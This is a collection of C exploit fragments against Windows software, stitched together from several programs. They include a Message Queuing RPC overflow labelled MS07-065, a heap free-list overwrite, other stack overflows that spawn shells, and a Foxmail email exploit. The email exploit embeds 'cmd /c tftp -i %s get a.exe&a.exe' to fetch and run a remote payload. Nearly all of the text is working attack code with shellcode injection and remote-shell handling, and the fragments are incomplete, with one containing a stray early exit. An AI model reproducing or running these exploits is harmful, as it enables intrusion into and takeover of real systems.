int main(int argc, char *argv[]) {
unsigned char Buff[1024];
unsigned char data;
unsigned long *ps;
int s, i, k;
if (argc < 3) {
fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
return -1;
}
s = Make_Connection(argv[1], atoi(argv[2]), 10);
if (!s) {
fprintf(stderr, "[-] Connect failed. \n");
return -1;
}
GetShellcode();
ps = (unsigned long *)Buff;
for(i=0; i<sizeof(Buff)/4; i++)
{
*(ps++) = 0x60000000;
}
i = sh_Len % 4;
memcpy(&Buff[sizeof(Buff) - sh_Len], sh_Buff, sh_Len);
ps = (unsigned long *)Buff;
for(i=0; i<92/4; i++)
{
*(ps++) = RET;
}
Buff[sizeof(Buff)] = 0;
//PrintSc(Buff, sizeof(Buff));
i = send(s, Buff, sizeof(Buff), 0);
if (i <= 0) {
fprintf(stderr, "[-] Send failed. \n");
return -1;
}
data='I';
i = send(s, &data, 1, 1);
if (i <= 0) {
fprintf(stderr, "[-] Send OOB data failed. \n");
return -1;
}
sleep (1);
shell(s);
}
int main()
{
SOCKET c,s;
WSADATA WSAData;
char Buff[1024];
unsigned short port;
struct sockaddr_in sa;
int salen = sizeof(sa);
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
printf("[-] WSAStartup failed.\n");
WSACleanup();
exit(1);
}
GetShellCode();
if (!sh_Len)
{
printf("[-] Shellcode generate error.\n");
exit(1);
}
s = Make_Connection("127.0.0.1", 4444, 10);
if(s<0)
{
printf("[-] connect error.\n");
exit(1);
}
// get local port
getsockname(s, (struct sockaddr FAR *)&sa, &salen);
Enc_key += Enc_key << 8;
port = sa.sin_port^Enc_key;
printf("port = %x %x\n", sa.sin_port, port);
//memcpy(&sh_Buff[sh_Len], &port, 2);
memcpy(&sh_Buff[sh_Len], &sa.sin_port, 2);
sh_Buff[sh_Len+2] = 0;
memset(Buff, 0x90, sizeof(Buff)-1);
strcpy(Buff+56, JUMPESP);
strcpy(Buff+60, sh_Buff);
send(s,Buff,sizeof(Buff),0);
Sleep(1000);
shell(s);
WSACleanup();
return 1;
}
int main(int argc, char *argv[])
{
SOCKET c,s;
WSADATA WSAData;
char Buff[1024];
if (argc < 3)
{
fprintf(stderr, "Usage: %s remote_addr remote_port", argv[0]);
exit(1);
}
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
printf("[-] WSAStartup failed.\n");
WSACleanup();
exit(1);
}
memset(Buff, 0x90, sizeof(Buff)-1);
strcpy(Buff+56, JUMPESP);
strcpy(Buff+60, shellcode);
s = Make_Connection(argv[1], atoi(argv[2]), 10);
if(s<0)
{
printf("[-] connect err.\n");
exit(1);
}
send(s,Buff,sizeof(Buff),0);
Sleep(1000);
c = Make_Connection(argv[1], 4444, 10);
shell(c);
WSACleanup();
return 1;
}
int main(int argc, char *argv[]) {
unsigned char Buff[1024];
unsigned char data;
unsigned long *ps;
int s, i;
if (argc < 3) {
fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
return -1;
}
s = Make_Connection(argv[1], atoi(argv[2]), 10);
if (!s) {
fprintf(stderr, "[-] Connect failed. \n");
return -1;
}
GetShellcode();
PrintSc(sh_Buff, sh_Len);
memset(Buff, 0x90, sizeof(Buff));
strcpy(Buff + (sizeof(Buff) - sh_Len - 1), sh_Buff);
ps = (unsigned long *)Buff;
for(i=0; i<128/4; i++)
{
*(ps++) = RET;
}
Buff[sizeof(Buff) - 1] = 0;
i = send(s, Buff, sizeof(Buff), 0);
if (i <= 0) {
fprintf(stderr, "[-] Send failed. \n");
return -1;
}
data='I';
i = send(s, &data, 1, 1);
if (i <= 0) {
fprintf(stderr, "[-] Send OOB data failed. \n");
return -1;
}
sleep (1);
// get shell use same socket
shell(s);
}
int
main (int argc, char *argv[])
{
unsigned char *target = NULL;
unsigned char *name = NULL;
int port = 2103;
int i, j, len, len2;
int ret;
char buffer[6000] = { 0 };
SOCKET s;
WSADATA WSAData;
printf("--------------------------------------------------------------------------\n");
printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) - MK mod ==-\n");
printf("-== code by axis@ph4nt0m ==-\n");
printf("-== Http://www.ph4nt0m.org ==-\n");
printf("-== Tested against Windows 2000 server SP4 ==-\n");
printf
("--------------------------------------------------------------------------\n\n");
if (argc < 5)
usage (argv[0]); //Handle parameters
for (i = 1; i < argc; i++)
{
if ((argv[i][0] == '-'))
{
switch (argv[i][1])
{
case 'h':
target = (unsigned char *) argv[i + 1];
break;
case 'p':
if (strcmp (argv[i + 1], "2103") == 0)
{
printf ("[+] Attacking default port 2103\n");
}
else
{
port = atoi (argv[i + 1]);
}
break;
case 'n':
name = (unsigned char *) argv[i + 1];
break;
default:
printf ("[-] Invalid argument: %s\n", argv[i]);
usage (argv[0]);
break;
}
i++;
}
else
usage (argv[0]);
}
request_1b = malloc (sizeof (char) * (strlen (name) * 2));
if (request_1b == NULL)
{
printf ("Allocation Error\n");
exit (1);
}
strcpy (request_1b, name);
for (i = 0, j = 0; j < (strlen (name) * 2); j++)
{
if (!(j % 2))
{
*(request_1b + j) = *(name + i);
}
else
{
*(request_1b + j) = '\x00';
i++;
}
}
/********************** attack payload ***************************/
if (WSAStartup (MAKEWORD (1, 1), &WSAData) != 0)
{
fprintf (stderr, "[-] WSAStartup failed.\n");
WSACleanup ();
exit (1);
}
Sleep (1200);
s = Make_Connection ((char *) target, port, 10);
if (s < 0)
{
fprintf (stderr, "[-] connect err.\n");
exit (1);
}
//Send our evil Payload
printf ("[*]Sending our Payload, Good Luck! ^_^\n");
printf ("[*]Sending RPC Bind String!\n");
send (s, bind_str, sizeof (bind_str), 0);
Sleep (1000);
printf ("[*]Sending RPC Request Now!\n");
len = 56 + (strlen (name) * 2) + 640;
request_1 = calloc (len, sizeof (char));
if (request_1 == NULL)
{
printf ("Allocation Error\n");
exit (1);
}
memcpy (request_1, request_1a, 56);
memcpy (request_1 + 56, request_1b, (strlen (name) * 2));
memcpy (request_1 + 56 + (strlen (name) * 2), request_1c, 640);
exit(1);
memset (buffer, '\x41', sizeof (buffer)); // fil the buffer to trigger seh
send (s, request_1, sizeof (request_1), 0);
send (s, buffer, 5104, 0); // fil the buffer to trigger seh
send (s, request_2, sizeof (request_2), 0);
Sleep (100);
memset (buffer, 0, sizeof (buffer));
ret = recv (s, buffer, sizeof (buffer) - 1, 0);
//printf("recv: %s\n", buffer);
Disconnect (s);
return 0;
}
int main(int argc, char *argv[])
{
unsigned char Buff[0x2000];
unsigned char data;
unsigned short bindport;
SOCKET c,s;
WSADATA WSAData;
unsigned short port;
struct sockaddr_in sa;
int salen = sizeof(sa);
int l,i,j,k;
PHEAP_FREE_ENTRY pFakeEntry1;
PHEAP_FREE_ENTRY pFakeEntry2;
PHEAP_FREE_ENTRY pFakeEntry3;
if (argc < 3)
{
fprintf(stderr, "Usage: %s remote_addr remote_port bind_port", argv[0]);
exit(1);
}
if (argc > 3)
{
bindport = atoi(argv[3]);
}
else
{
bindport = 4444;
}
GetShellCode();
if (sh_Len == 0)
{
fprintf(stderr, "Generate shellcode failed!\n");
exit(1);
}
Enc_key += Enc_key << 8;
bindport ^= Enc_key;
memcpy(&sh_Buff[sh_Len-4], &bindport, 2);
bindport ^= Enc_key;
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
printf("[-] WSAStartup failed.\n");
WSACleanup();
exit(1);
}
s = Make_Connection(argv[1], atoi(argv[2]), 10);
if(s<0)
{
printf("[-] connect err.\n");
exit(1);
}
// Construct Buff
memset(Buff, 'A', sizeof(Buff));
memcpy(Buff, sh_Buff, sh_Len);
// buf2
pFakeEntry1 = (PHEAP_FREE_ENTRY)&Buff[OFFSET];
pFakeEntry1->PreviousSize = 0x8;
pFakeEntry1->Size = 0x2;
pFakeEntry1->SegmentIndex = 0x31;
pFakeEntry1->Flags = HEAP_ENTRY_SETTABLE_FLAG2 | HEAP_ENTRY_BUSY;
pFakeEntry1->Index = 0x0;
pFakeEntry1->Mask = 0x0;
// fakechunk1
pFakeEntry2 = (PHEAP_FREE_ENTRY)&Buff[OFFSET-64];
pFakeEntry2->PreviousSize = 0x2;
pFakeEntry2->Size = 0x2;
pFakeEntry2->SegmentIndex = 0x31;
pFakeEntry2->Flags = HEAP_ENTRY_SETTABLE_FLAG2;
pFakeEntry2->Index = 0x1;
pFakeEntry2->Mask = 0x1;
pFakeEntry2->FreeList.Flink = (LIST_ENTRY*)FastPebLockRoutine;
pFakeEntry2->FreeList.Blink = (LIST_ENTRY*)WriteSpace;
// fakechunk2
pFakeEntry3 = (PHEAP_FREE_ENTRY)&Buff[OFFSET-32];
pFakeEntry3->PreviousSize = 0x2;
pFakeEntry3->Size = 0x2;
pFakeEntry3->SegmentIndex = 0x31;
pFakeEntry3->Flags = HEAP_ENTRY_SETTABLE_FLAG2;
pFakeEntry3->Index = 0x1;
pFakeEntry3->Mask = 0x1;
pFakeEntry3->FreeList.Flink = (LIST_ENTRY*)0x902BD0C2; // RETN 2BD0
pFakeEntry3->FreeList.Blink = (LIST_ENTRY*)WriteSpace;
i = send(s,Buff,sizeof(Buff),0);
Sleep(1000);
c = Make_Connection(argv[1], bindport, 10);
if(c<0)
{
printf("[-] connect err.\n");
exit(1);
}
shell(c);
WSACleanup();
return 1;
}
//send magic mail
int SendXMail( char *mailaddr, char *tftp, char *smtpserver, char *shellcode)
{
SOCKET csock;
int ret,i=0;
char buf[510], sbuf[0x10000], tmp[500], tmp1[500];
csock = Make_Connection(smtpserver, SMTPPORT, 10);
if(csock<0)
{
printf("connect err.\n");
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf("recv err.\n");
exit(1);
}
printf(buf);
ret=send(csock, "HELO server\r\n",strlen("HELO server\r\n"), 0);
if(ret<=0)
{
printf("send err.\n");
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf("recv err.\n");
exit(1);
}
printf(buf);
ret=send(csock, "MAIL FROM: [email protected]\r\n",strlen("MAIL FROM: [email protected]\r\n"), 0);
if(ret<=0)
{
printf("send err.\n");
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf("recv err.\n");
exit(1);
}
printf(buf);
sprintf(tmp, "RCPT TO: %s\r\n", mailaddr);
ret=send(csock, tmp,strlen(tmp), 0);
if(ret<=0)
{
printf("send err.\n");
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf("recv err.\n");
exit(1);
}
printf(buf);
Sleep(1000);
ret=send(csock, "DATA\r\n",strlen("DATA\r\n"), 0);
if(ret<=0)
{
printf("send err.\n");
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf("recv err.\n");
exit(1);
}
printf(buf);
printf("send exploit mail...\n");
memset(sbuf, 0, sizeof(sbuf));
memset(buf, 0, sizeof(buf));
memset(buf, 0x41, sizeof(buf)-1);
memset(tmp, 0, sizeof(tmp));
//strcpy(tmp, winexec);//WinExec() address in Foxmail.exe module(foxmail 5.0.300)
strcpy(tmp, shellcode);//WinExec() address in Foxmail.exe module
strcat(tmp, "cmd /c tftp -i %s get a.exe&a.exe:");
sprintf(tmp1, tmp, tftp);
memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1));
*(int *)(buf+0x100)=0x7ffa54cd; //ret addr jmp esp
*(int *)(buf+0x104)=0x80eb80eb; //jmp back
*(int *)(buf+0x108)=0x7ffdf220; //writeable addr
*(int *)(buf+0x110)=0x7ffdf220; //writeable addr
memcpy(buf, "girl\x0d", 5);
sprintf(sbuf, (char *)packet, buf);
ret=send(csock, sbuf,strlen(sbuf), 0);
if(ret<=0)
{
printf("send err.\n");
exit(1);
}
memset(buf, 0, sizeof(buf));
ret=recv(csock, buf, 4096, 0);
if(ret<=0)
{
printf("recv err.\n");
exit(1);
}
printf(buf);
printf("exploit mail sent.\n");
closesocket(csock);
return 0;
}
